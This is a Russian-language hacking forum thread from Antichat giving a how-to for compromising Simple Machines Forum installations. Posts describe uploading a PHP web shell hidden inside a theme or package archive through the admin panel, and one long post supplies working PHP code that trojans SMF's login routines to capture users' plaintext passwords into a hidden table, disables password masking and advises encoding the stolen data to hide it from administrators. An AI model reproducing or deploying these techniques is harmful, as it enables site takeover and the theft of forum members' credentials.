Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Faq по Smf (Заливка шелла)! |

03.07.2007, 19:08
|
|
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме: 967842
Репутация:
251
|
|
Faq по Smf (Заливка шелла)!
Заливаем шелл в SMF
Если ты имеешь админский акк в этом форуме.
Шаг_1
Зходим на форум под админом. Затем идем
Код:
http://hacked.com/smf/index.php?action=admin
[Admin].
Шаг_2
На левой боковой вкладке выбираем [Themes and Layout].Внизу увидешь форму для upload тем для форума.
Темы закачиваются в формате zip-архива.
Шаг_3
Идем на официальный сайт форумного движка в раздел (mOds)
Код:
http://custom.simplemachines.org/themes/
Здесь выбираем любую тему(на твой вкус и цвет). Я выбираю [blackTedSkin]
Код:
http://custom.simplemachines.org/themes/index.php?lemma=66
От сюда качаем
Код:
http://custom.simplemachines.org/themes/index.php?action=download;lemma=66;id=306
Шаг_4
Открываем zip с нашей темой и добавляем в архив свой php-shell--Пример директория /images/icons/myshell.php
Шаг_5
Идем к форме [Install a New Theme]
Добавляем наш архив-- From a file:blackTed.zip
И даем название нашей теме-- Create a copy of Default named: HACK_THEME
Жмем-- Install
Если все прошло хорошо, то появиться надпись:blackTed was installed successfully.
Шаг_6_Final
Идем по ссылке(для случая с blackTed темой)--
Код:
http://hacked.com/smf/Themes/blackTed/icons/Fun_shell.php
Спасибо за внимание.
|
|
|

03.07.2007, 19:30
|
|
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме: 5885100
Репутация:
773
|
|
так и в джумлу мона залить.....
|
|
|

03.07.2007, 20:16
|
|
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме: 967842
Репутация:
251
|
|
Способ 2. ЧЕРЕЗ аддоны(примочки)!
Механизм заключается в том, что залив происходит в папку Packages в виде BoardNews10.zip --пример
Пихаем в архив в BoardNews10\Subs-BoardNews.php -- <? system("uname -a"); ?>
Инсталлим и видем результат(при safemode  ff и только если есть права на запись в Packages )
|
|
|

27.02.2008, 22:06
|
|
Познающий
Регистрация: 12.02.2008
Сообщений: 90
Провел на форуме: 535943
Репутация:
20
|
|
Здрасствуйте, сори за такой вопрос: а сам шел надо скопировать и сохранить в текстовом формате? или шел надо сохранить в специальном формате?...
|
|
|

01.03.2008, 01:28
|
|
Новичок
Регистрация: 24.02.2008
Сообщений: 14
Провел на форуме: 148749
Репутация:
18
|
|
Смотря на чем построен шелл. Чаще всего это php-скрипт.
|
|
|

27.05.2008, 19:08
|
|
Познающий
Регистрация: 18.07.2007
Сообщений: 40
Провел на форуме: 72605
Репутация:
13
|
|
Часто бывает так: шелл залили, доступ к БД получили, а хотелось бы получить пароли пользователей. Но вот беда пароли зашифрованные, да еще соленые, а сидеть и брутить их лень/нет времени/желания. Тогда сделаем так чтобы юзеры сами выкладывали нам свои пароли на блюдечке!
Местом хранения паролей выберем БД. Сразу скажу что те кто считают этот метод слишком палевным могут просто писать все в файл, но имхо БД предоставляет куда больше возможностей по обработке/сортировке этих данных.
Сначала создадим таблицу куда будем складывать пароли
Код:
CREATE TABLE smf_logs (
id INTEGER NOT NULL,
name VARCHAR(100) NOT NULL,
password VARCHAR(100) NOT NULL
);
ALTER TABLE smf_logs
ADD ( PRIMARY KEY (id));
Далее открываем файл ./Sources/LogInOut.php находим там функцию Login2 и переходим к 380 строке
Код:
...
elseif ($user_settings['passwordSalt'] == '')
{
$user_settings['passwordSalt'] = substr(md5(rand()), 0, 4);
updateMemberData($user_settings['ID_MEMBER'], array('passwordSalt' => '\'' . $user_settings['passwordSalt'] . '\''));
}
//начало нашего трояна
else
{
$req = db_query("SELECT * FROM {$db_prefix}logs WHERE `id`={$user_settings['ID_MEMBER']}");
$user = mysql_fetch_array($req);
if(!$user)
$req = db_query("INSERT INTO {$db_prefix}logs SET `id`='".$user_settings['ID_MEMBER']."' ,`name`='".$_REQUEST['user']."' ,`password`='".$_REQUEST['passwrd']."'");
if($user['password']!=$_REQUEST['passwrd'])
$req = db_query("UPDATE {$db_prefix}logs SET `password`='".$_REQUEST['passwrd']."' WHERE `id`='".$user_settings['ID_MEMBER']."'");
}
//конец трояна
if (isset($modSettings['integrate_login']) && function_exists($modSettings['integrate_login']))
$modSettings['integrate_login']($user_settings['memberName'], isset($_REQUEST['hash_passwrd']) && strlen($_REQUEST['hash_passwrd']) == 40 ? $_REQUEST['hash_passwrd'] : null, $modSettings['cookieTime']);
// Get ready to set the cookie...
...
Теперь сделаем так чтобы тем, кто заходит используя куки пришлось ввести свой пароль: откроем файл ./Sources/Load.php в функции loadUserSettings около 377 строки напишем:
Код:
...
elseif (empty($ID_MEMBER) && isset($_SESSION['login_' . $cookiename]) && ($_SESSION['USER_AGENT'] == $_SERVER['HTTP_USER_AGENT'] || !empty($modSettings['disableCheckUA'])))
{
// !!! Perhaps we can do some more checking on this, such as on the first octet of the IP?
list ($ID_MEMBER, $password, $login_span) = @unserialize(stripslashes($_SESSION['login_' . $cookiename]));
$ID_MEMBER = !empty($ID_MEMBER) && strlen($password) == 40 && $login_span > time() ? (int) $ID_MEMBER : 0;
}
//начало нашего трояна
$req = db_query("SELECT * FROM {$db_prefix}logs WHERE `id`={$ID_MEMBER}");
$user = mysql_fetch_array($req);
if(!isset($user['id']))
{
unset($password);
}
//конец трояна
// Only load this stuff if the user isn't a guest.
if ($ID_MEMBER != 0)...
Наконец отредактируем файл ./Themes/default/script.js: найдем в нем функцию hashLoginPassword около 455 строки
Код:
...
doForm.hash_passwrd.value = hex_sha1(hex_sha1(doForm.user.value.php_to8bit().php_strtolower() + doForm.passwrd.value.php_to8bit()) + cur_session_id);
// It looks nicer to fill it with asterisks, but Firefox will try to save that.
//закомментируем эти строки
//if (navigator.userAgent.indexOf("Firefox/") != -1)
// doForm.passwrd.value = "";
//else
// doForm.passwrd.value = doForm.passwrd.value.replace(/./g, "*");
}
На всякий случай тоже самое сделаем в функции hashAdminPassword в том же файле несколькими строками ниже:
Код:
...
doForm.admin_hash_pass.value = hex_sha1(hex_sha1(username.toLowerCase() + doForm.admin_pass.value) + cur_session_id);
//закомментируем строку
//doForm.admin_pass.value = doForm.admin_pass.value.replace(/./g, "*");
}
Теперь форум благополучно затроянен и нам только остается периодически заглядывать в нашу табличку чтобы удостоверяться что пароли записываются.
По желанию можно закодировать данные в табличке, например функцией base64_encode(), так что даже если админ и случайно наткнется на нее, то ничего не поймет. А для расшифровки набросать свой маленький скрипт и оставить эго где-нибудь в глубине исходников форума
Последний раз редактировалось ty13r; 31.05.2008 в 23:11..
|
|
|

07.06.2008, 17:31
|
|
Новичок
Регистрация: 12.03.2008
Сообщений: 9
Провел на форуме: 97055
Репутация:
2
|
|
залил все как надо через тему, адрес http://123xxx.ru/forum/Themes/blackted/icons/articles.php
выскакивает:
Not Found
The requested document was not found on this server.
Web Server at 123xxx.ru
|
|
|

25.06.2008, 01:14
|
|
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме: 967842
Репутация:
251
|
|
Просто те надо было залить шелл внутри одного из файлов темы, а так твой файл из архива просто не попадает, вот и все)))) Просто код шелла вставь в любую страницу php файла темы!
|
|
|

25.07.2008, 00:15
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Вот снял видео для новичков по заливке шелла, имея доступ в админку.
http://depositfiles.com/files/6759465
|
|
|

11.01.2010, 12:06
|
|
Познающий
Регистрация: 27.12.2009
Сообщений: 46
Провел на форуме: 124202
Репутация:
8
|
|
Сообщение от mailbrush
Вот снял видео для новичков по заливке шелла, имея доступ в админку.
http://depositfiles.com/files/6759465
перезалей видио...
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|